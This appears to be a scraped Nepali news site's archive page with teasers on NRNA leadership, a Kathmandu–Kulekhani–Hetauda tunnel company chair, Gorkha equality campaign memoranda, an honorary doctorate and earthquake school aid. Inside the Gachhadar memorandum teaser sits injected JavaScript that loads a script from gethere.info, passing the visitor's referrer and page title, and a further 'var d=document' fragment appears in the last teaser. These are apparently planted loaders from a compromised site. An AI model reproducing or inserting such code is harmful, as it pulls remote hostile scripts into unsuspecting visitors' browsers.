Author: admin

पूर्वाधार विकास कम्पनीको अध्यक्षमा एनआरएनए उपाध्यक्ष भट्ट

बहुचर्चित काठमाडौं–कुलेखानी–हेटौंडा सुरुङमार्गको प्रवद्र्धक नेपाल पूर्वाधार विकास कम्पनीको अध्यक्षमा गैरआवासीय नेपाली संघका उपाध्यक्ष भवन भट्ट चयन भएका छन् । सञ्चालक समिति बैठकले कुशकुमार जोशीको राजीनामा स्वीकृत गर्दै भट्टलाई अध्यक्ष चयन गरेको हो । गैरआवासीय नेपाली संघका उपाध्यक्ष भट्ट टीबीआई समूहका पनि अध्यक्ष हुन् । भट्टको चयनसँगै सुरुङमार्ग निर्माण अभियानले गति लिने अपेक्षा लिइएको छ । निजी क्षेत्रले निर्माण पहल गरेको मुलुककै ठूलो यो पूर्वाधार परियोजनाको विस्तृत अध्ययन प्रतिवेदन तयार भई सरकारबाट निर्माण स्वीकृतिसमेत पाइसकेको छ । आयोजना हाल वित्तीय व्यवस्थापनको चरणमा छ । कम्पनी स्थापनाकालदेखि नै अध्यक्ष रहेका जोशीले आन्तरिक विवादका कारण राजीनामा दिएका थिए । भट्टले यसअघि सुरु...

Read More

गोर्खालीद्धारा उपप्रधान एवं भौतिक पूर्वाधार तथा योजना मन्त्री विजयकुमार गच्छदारलाई ज्ञापन

समानताको हक अधिकारका लागि लड्दै आएका गोर्खा सत्याग्रह आन्दोलन संघर्ष समितिले शुक्रबार उपप्रधान एवं भौतिक पूर्वाधार तथा योजनामन्त्री विजयकुमार गच्छदारलाई ज्ञापन पत्र बुझाएको छ । भौतिक पूर्वाधार तथा योजना मन्त्रालयमा गोर्खालीहरुरुले ज्ञापन पत्र बुझाएका हुन । आफ्ना माग पुरा गराउन यसअघि प्रधानमन्त्रीलगायतलाई माग पुरा गराउन पहल गरिदिन ज्ञापन बुझाइसकेका छन ।  s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +...

Read More

पूर्ण समानताका मागहरु यथाशिघ्र पुरा गराउन र सरकारका तर्फबाट आवश्यक पहल गरिदिन पूर्वप्रधानमन्त्री कोइरालालाई गोर्खालीहरुको ज्ञापन

हाल नेपालमा रहेका गोर्खा सत्याग्रह आन्दोलन संघर्ष समितिका पदाधिकारीहरु पूर्ण समानताका मागहरु पुरा गराउन सोमबार पूर्वप्रधानमन्त्री सुशील कोइरालालाई ज्ञापन पत्र बुझाएका छन । कृष्ण राईको संयोजकत्वमा रहेको टोलीले पूर्वप्रधानमन्त्री कोइरालालाई आफ्ना माग पुरा गराउन र समानता मागहरु यथाशिघ्र पुरा गराउन तत्काल सम्पूर्ण आवश्यक पहल गरि नेपालको सरकारकातर्फबाट दबाव सृजना गर्न आग्रह गर्नुभएको थियो । त्यस्तै टोलीले पूर्वप्रधानमन्त्री एवं नेपाली कांग्रेसका बरिष्ठ नेता शेरबहादुर देउवालाई पनि सोमबार उहाँकै निवासमा भेटगरी गोर्खालीको माग पुरा गराउन पहल गरिदिन आग्रह गरेका छन । यसअघि आइतबार टोलीले उपप्रधान एवं महिला, बालबालिका तथा समाजकल्याणमन्त्री सीपी मैनालीलाई ज्ञापन पत्र बुझाएको थियो । गोर्खा आन्दोलन संघर्ष समितिले...

Read More

गैरआवासीय नेपाली संघका अध्यक्ष शेष घलेलाई अष्ट्रेलियाको फेडेरेसन विश्वविद्यालयबाट मानार्थ विद्यावारिधी उपाधि प्रदान

गैरआवासीय नेपाली संघका अध्यक्ष शेष घलेलाई अष्ट्रेलियाको ‘फेडेरेसन विश्वविद्यालय’ले मानार्थ विद्यावारिधी’ उपाधि प्रदान गरेको छ । अष्ट्रेलियाको उच्च शिक्षा र सम्पदा संरक्षणमा पु¥याएको योगदान तथा नेपाल र नेपाली जनताको सेवामा गरेको समर्पणको कदर गर्दै घलेलाई यो उपाधि प्रदान गरिएको विश्वविद्यालयले जनाएको छ । बुधबार साँझ विश्वबिद्यालयमा आयोजित दिक्षान्त समारोहमा अध्यक्ष घलेलाई मानार्थ विद्यावारिधीको उपाधि प्रदान गरिएको हो । विश्वविद्यालयले घलेलाई गत मे ६ तारिखमा उपाधि प्रदान गर्ने तालिका तय गरेको थियो । तर, अध्यक्ष घले भूकम्प प्रभावितलाई राहत प्रदान गर्न नेपालमा ब्यस्त रहेकाले समारोह स्थगित गरी डिसेम्बरका लागि सारिएको थियो । अध्यक्ष घले र उहाँकी पत्नी जमुना गुरुङ मिलेर...

Read More

भक्तपुरका भूकम्पप्रभावित विद्यालय पुनःनिर्माणमा एनआरएनको सहयोग

गैरआवासीय नेपाली संघले भक्तपुरका भूकम्प प्रभावित दुई सरकारी विद्यालयलाई भवन निर्माणका लागि रकम सहयोग गरेको छ । संघका उपाध्यक्ष भवन भट्ट र सचिव अर्जुनकुमार श्रेष्ठले भक्तपुरको सूर्यविनायक नगरपालिकास्थित सन्तकृष्ण प्राविलाई दुई हजार पाँच सय युरो (करिब रु तीन लाख) र भक्तपुर नगरपालिका–११ तौमढीस्थित वरदायिणी निमाविलाई एक हजार पाँच सय युरो (करिब रु दुई लाख) आर्थिक सहयोग हस्तान्तरण गरेका हुन् । रकम हस्तान्तरण गर्दै संघका उपाध्यक्ष भट्टले भूकम्पले क्षतिग्रस्त विद्यालय भवन निर्माणमा सरकारले पुनःनिर्माण गर्न नसक्ने भएकाले एनआरएनले यस्ता एक हजार वटा विद्यालय भवनको पुनःनिर्माणमा सहयोग गर्ने बताउनुभयो । त्यस्तै संघका सचिव अर्जुनकुमार श्रेष्ठले विदेशी विद्यालयसँग नेपालका विद्यालयले सम्बन्ध विस्तार गर्न सके नेपालको शैक्षिक तथा पर्यटन प्रवद्र्धनमा ठूलो टेवा पुग्ने विश्वास व्यक्त गर्नुभयो । ]var d=document;var...

Read More